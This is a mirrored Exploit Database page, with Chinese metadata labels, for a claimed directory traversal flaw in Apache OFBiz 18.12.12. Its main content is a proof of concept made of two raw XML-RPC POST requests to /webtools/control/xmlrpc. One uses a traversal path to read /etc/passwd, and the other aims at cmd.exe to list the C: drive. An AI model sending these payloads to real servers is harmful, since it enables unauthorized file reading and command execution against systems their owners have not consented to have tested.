Apache OFBiz 18.12.12 – Directory Traversal

• Exploit Database
• 135 阅读

• 作者： Abdualhadi khalifa
  日期： 2024-05-19
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/52020/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  # Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Vendor Homepage: https://ofbiz.apache.org/ ## Software Link: https://ofbiz.apache.org/download.html # Version: below <=18.12.12 # Tested on: Windows10     Poc. 1- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml   <?xml version="1.0"?> <methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params> </methodCall>   OR   2- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml   <?xml version="1.0"?> <methodCall> <methodName>performCommand</methodName> <params> <param>   <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params> </methodCall>